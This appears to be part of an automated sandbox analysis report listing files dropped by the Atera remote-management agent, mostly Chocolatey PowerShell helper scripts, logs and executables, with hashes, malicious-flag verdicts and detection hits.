                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):9740
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.124129906660506
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Install-ChocolateyZipPackage {..<#...SYNOPSIS..Downloads file from a url and unzips it on your machine. Use..Get-ChocolateyUnzip when local or embedded file......DESCRIPTION..This wi
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2178
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.225120339484231
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Install-Vsix {..<#...SYNOPSIS..DO NOT USE. Not part of the public API......DESCRIPTION..Installs a VSIX package into a particular version of Visual Studio......NOTES..This is not par
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):4463
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.326623524611151
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Set-EnvironmentVariable {..<#...SYNOPSIS..**NOTE:** Administrative Access Required when `-Scope 'Machine'.`....DO NOT USE. Not part of the public API. Use..`Install-ChocolateyEnviron
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1711
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.130959499082034
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2011 - 2017 RealDimensions Software, LLC..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...#..# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....Function Set-PowerShellExitCode {..<#...SYNOPSIS..Sets the exit code for the PowerShell scripts......DESCRIPTION..Sets the exit code as an environment variable that is checked and used..as the exit code for the package at the end of the package script......NOTES..This tells PowerShell that it should prepare to shut down....
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (495), with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):16063
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.071535838625921
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Start-ChocolateyProcessAsAdmin {..<#...SYNOPSIS..**NOTE:** Administrative Access Required.....Runs a process with administrative privileges. If `-ExeToRun` is not..specified, it is r
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1913
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.085202352125102
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Test-ProcessAdminRights {..<#...SYNOPSIS..Tests whether the current process is running with administrative rights......DESCRIPTION..This function checks whether the current process h
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2897
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.162176606162476
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Uninstall-ChocolateyZipPackage {..<#...SYNOPSIS..Uninstalls a previous installed zip package, may not be necessary......DESCRIPTION..This will uninstall a zip file if installed via I
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):3683
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.175198661740516
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Uninstall-BinFile {..<#...SYNOPSIS..Removes a shim (or batch redirect) for a file......DESCRIPTION..Chocolatey installs have the folder `$($env:ChocolateyInstall)\bin`..included in t
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):3131
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.1027007896112115
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2011 - 2017 RealDimensions Software, LLC..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...#..# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Uninstall-ChocolateyEnvironmentVariable {..<#...SYNOPSIS..**NOTE:** Administrative Access Required when `-VariableType 'Machine'.`....Removes a persistent environment variable......DESCRIPTION..Uninstall-ChocolateyEnvironmentVariable removes an environment variable..with the specified name and value. The variable c
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):6062
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.047713257621158
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Uninstall-ChocolateyPackage {..<#...SYNOPSIS..Uninstalls software from "Programs and Features"......DESCRIPTION..This will uninstall software from your machine (in Programs and..Feat
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):3611
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.0574071891740795
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Update-SessionEnvironment {..<#...SYNOPSIS..Updates the environment variables of the current powershell session with..any environment variable changes that may have occured during a.
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1974
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.219633769893594
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2011 - 2017 RealDimensions Software, LLC..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...#..# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Write-FunctionCallLogMessage {..<#...SYNOPSIS..DO NOT USE. Not part of the public API......DESCRIPTION..Writes function call as a debug message......NOTES..Available in 0.10.2+.....This function is not part of the API......INPUTS..None.....OUTPUTS..None.....PARAMETER Invocation..The invocation of the function (`$My
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):32
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.632048827786958
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:jqAdGdtGdnn:+hTGF
                                                                                                                                                                                                                                                                                              MD5:FB26701A5D20C5077053DFE015B37875
                                                                                                                                                                                                                                                                                              SHA1:2EA39F4E21B117BEB8517F60D304070DA3A8055D
                                                                                                                                                                                                                                                                                              SHA-256:759B3461F7A0991CC2A036560924ADC50EA1C15C4D17F590EEBD457330157495
                                                                                                                                                                                                                                                                                              SHA-512:42A8832B0523D8F0720BB02C91815E3DBF71EC02C935A947A465FC0E00FFBDCF511D7DFC921DE54669312AE9735B53EDF21957F55A00D60977B1A1325FE496C8
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:ecc39e64c8fba863f2e647300224d62f
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):280616
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.691023070642676
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:AG0WgexKpGi8PnJcerXUaxX3HVeES4BEIqTTpX/4ormGpnaVTSGCkMhkEn7GAhC6:AJrycoB3HVeESME3pnaVTS1nh7hCav
                                                                                                                                                                                                                                                                                              MD5:30B0542E627055A7D48687D541A9E6BA
                                                                                                                                                                                                                                                                                              SHA1:E12D2EE08CA0566A037824C3D6F4F316F088BD03
                                                                                                                                                                                                                                                                                              SHA-256:170BF6875CF59E62A72FC2E414EA7F1364F9819534D5EE9E453C96E6863BCC35
                                                                                                                                                                                                                                                                                              SHA-512:2694B174D93D13D2C3CF087551CBDB822548195D9582427B20AA9A2D6E1E1DCB362B4612C5D539E9E567812DD589B227738B3B4A631B4A9D3F6AF0E4549584C6
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):28903
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.251346989570315
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:Tmh6T6O6M6K6kQMhrVjymtdCDeq14cfgRaI0+ZPDF7q7JslG40rU/BL/L+4Q+7JU:aQLk9P74owZCtiGlqXzCtsnf5eofVCxj
                                                                                                                                                                                                                                                                                              MD5:31C01F03E1B4272ABCD557E20252D4C5
                                                                                                                                                                                                                                                                                              SHA1:730D0424AD1A9B712FA5F538E295A2BD0EFDF1E8
                                                                                                                                                                                                                                                                                              SHA-256:C37A51CCBE04188D68FB3F86E240492C04CF0BA966E4E30224680AE2A6B285A7
                                                                                                                                                                                                                                                                                              SHA-512:3AF51A66EBBA85976EEE7A6A8A8514F2140877B8AF48529309D4E9D5446015D765ADFB1433B38F4179D457C2A80AB5E05B68D2412E4FED9C775FCD1BF286C7F9
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\logs\choco.summary.log, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:2025-01-06 06:59:14,888 3248 [WARN ] - Directory 'C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\lib' does not exist...2025-01-06 06:59:15,122 3248 [WARN ] - Enabled allowGlobalConfirmation..2025-01-06 06:59:15,200 3248 [WARN ] - Directory 'C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\lib' does not exist...2025-01-06 06:59:15,388 3248 [WARN ] - 0 packages installed...2025-01-06 06:59:15,403 3248 [WARN ] - ..Did you know Pro / Business automatically syncs with Programs and.. Features? Learn more about Package Synchronizer at.. https://chocolatey.org/compare..2025-01-06 06:59:15,481 3248 [WARN ] - Directory 'C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\lib' does not exist...2025-01-06 06:59:15,544 3248 [INFO ] - Outdated Packages.. Output is package name | current version | available version | pinned?....2025-01-06 06:59:15,685 3248 [WARN ] - ..Chocolatey has det
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):18099
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.530728032151808
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:dHQOhH0gyPFPzZhja2VRzdJa5dDp4RNk6P3C5CzzhdIlH4AHpdSgkIUeaeLe5e2j:P23C5Czzxnf5eofVCxm6C5CzzGqM
                                                                                                                                                                                                                                                                                              MD5:23E259A06131151355A5000F32AA87A6
                                                                                                                                                                                                                                                                                              SHA1:69EFA7D754BEDA8DB88BFF5886C491C12C71D58C
                                                                                                                                                                                                                                                                                              SHA-256:ADBD45E7F1DA3516BBECB852E7F50E3CB630F53C3243DB09533631754FBDCDF3
                                                                                                                                                                                                                                                                                              SHA-512:C9F1553FAAFAA8A1ACE948055B74D878CA3172A784659D6B652186A41B99BFF49697C80E4E9663D173615E6E0316843F41C73D5DCD3F0F28D56DFE4A415695E7
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\logs\chocolatey.log, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:2025-01-06 07:17:53,691 3248 [INFO ] - microsoft-edge 131.0.2903.112 [Approved]..2025-01-06 07:17:53,691 3248 [INFO ] - intel-dsa 24.6.49.8 [Approved] Downloads cached for licensed users..2025-01-06 07:17:53,706 3248 [INFO ] - ffmpeg 7.1.0 [Approved]..2025-01-06 07:17:53,706 3248 [INFO ] - webview2-runtime 131.0.2903.112 [Approved] Downloads cached for licensed users..2025-01-06 07:17:53,706 3248 [INFO ] - ffmpeg-full 7.1.0 [Approved] - Possibly broken..2025-01-06 07:17:53,706 3248 [INFO ] - OpenCV 4.10.0 [Approved] Downloads cached for licensed users..2025-01-06 07:17:53,722 3248 [INFO ] - ffmpeg-shared 7.1.0 [Approved] Downloads cached for licensed users..2025-01-06 07:17:53,722 3248 [INFO ] - microsoft-edge-insider 132.0.2957.26 [Approved] Downloads cached for licensed users..2025-01-06 07:17:53,738 3248 [INFO ] - WinSecurityBaseline 20.1803.0 [Approved]..2025-01-06 07:17:53,738 3248 [INFO ] - microsoft-edge-insider-dev 132.0.2957.11 [Approved] Downloads cached for licensed users..2
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (3904), with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):3904
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.6141220025979965
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:96:Lui8IbX5aU2BKJ4YyTl/HVLg+yfjSl/H0trAI8e6hmri:Si88X5aU2KATdHpg+ybSdH0FAe6hmri
                                                                                                                                                                                                                                                                                              MD5:E374F555FEF3882C09C0B0DA8C491B38
                                                                                                                                                                                                                                                                                              SHA1:19F6BC7EA5172B9AB911D573B5B132DCCD2719DE
                                                                                                                                                                                                                                                                                              SHA-256:E74E5D2F2A4955CAE5D5BE82F8AEE8FA2138D70CF500386C2FDF68CD999E22E8
                                                                                                                                                                                                                                                                                              SHA-512:4BF18BCCF893FA12848876F4963A6D0D353F4A9141DCDFD4DFBE7BE662D77D975C6B7EF2CC5A057FDDE133DBAE04AD74A6B551BEDBD63D80F7A862542B6995BD
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2340
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.120693108028518
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:WJhzy3v9zec4JksG5A10JZ65RhS9JlqUp7B9nplD6e7B5yg:42V6Q5A1B5C9L/
                                                                                                                                                                                                                                                                                              MD5:B4326546C3A252494DCD512976F8B89A
                                                                                                                                                                                                                                                                                              SHA1:09D10EA0ABDBDE8C2B5BAFE410ED3B96AB0076C8
                                                                                                                                                                                                                                                                                              SHA-256:9B251737A6B6ACE9FDE45B64FD653B04575C6416F15112FBE1697A47B14990E6
                                                                                                                                                                                                                                                                                              SHA-512:E58EDC6DC66A289358E7FDE7C3F1D73A0EE1F7A6DB382DD1318FAA205E12271C081617B8366ECD1FCB3A0BC5A98F4B0F0C389C99A63D9EDF7CE1BD230AC85EC2
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:@echo off..::..:: RefreshEnv.cmd..::..:: Batch file to read environment variables from registry and..:: set session variables to these values...::..:: With this batch file, there should be no need to reload command..:: environment every time you want environment changes to propagate....::echo "RefreshEnv.cmd only works from cmd.exe, please install the Chocolatey Profile to take advantage of refreshenv from PowerShell"..echo | set /p dummy="Refreshing environment variables from registry for cmd.exe. Please wait..."....goto main....:: Set one environment variable from registry key..:SetFromReg.. "%WinDir%\System32\Reg" QUERY "%~1" /v "%~2" > "%TEMP%\_envset.tmp" 2>NUL.. for /f "usebackq skip=2 tokens=2,*" %%A IN ("%TEMP%\_envset.tmp") do (.. echo/set "%~3=%%B".. ).. goto :EOF....:: Get a list of environment variables from registry..:GetRegEnv.. "%WinDir%\System32\Reg" QUERY "%~1" > "%TEMP%\_envget.tmp".. for /f "usebackq skip=2" %%A IN ("%TEMP%\_envget.tmp") do (
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):136704
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.174853806484254
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:ED98HpKI6GCLOwstyhZFChcssc56FUrgxvbSD4UQrO2:Y9GpKbShcHUa
                                                                                                                                                                                                                                                                                              MD5:DDD072DBD2267BCB3081340E57ED092B
                                                                                                                                                                                                                                                                                              SHA1:04EC398A1DE53DC960A882363A528E162350C57C
                                                                                                                                                                                                                                                                                              SHA-256:460F604144DD93A3794F75C9E09B2676D7AD1295CD92499FAD80ED3C27990F02
                                                                                                                                                                                                                                                                                              SHA-512:2271C5846254EAA7389D23EE0241814D06D34257A7B6D44FE7CBEA14F3ACA5101457FAD934B22D2B9B49F1263BCB4209D8EADC07DB93E2B5E01CCDA5BD6ED2A8
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
